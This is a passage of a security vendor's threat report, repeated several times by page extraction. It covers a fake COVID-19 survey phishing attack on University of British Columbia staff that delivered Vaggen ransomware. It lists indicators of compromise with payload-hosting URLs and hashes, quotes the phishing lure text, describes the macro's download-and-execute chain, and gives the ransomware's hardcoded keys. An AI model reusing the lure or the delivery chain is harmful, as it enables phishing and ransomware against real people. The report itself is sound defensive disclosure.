3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2427 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2428 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2429 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2430 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2431 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2432 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2433 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2434 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2435 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2436 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2437 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2438 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2439 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2440 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2441 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2442 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2443 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2444 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2445 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2446 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2447 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2448 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2449 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2450 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2451 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2452 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2453 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2454 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2455 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2456 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2457 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2458 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2459 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2460 of 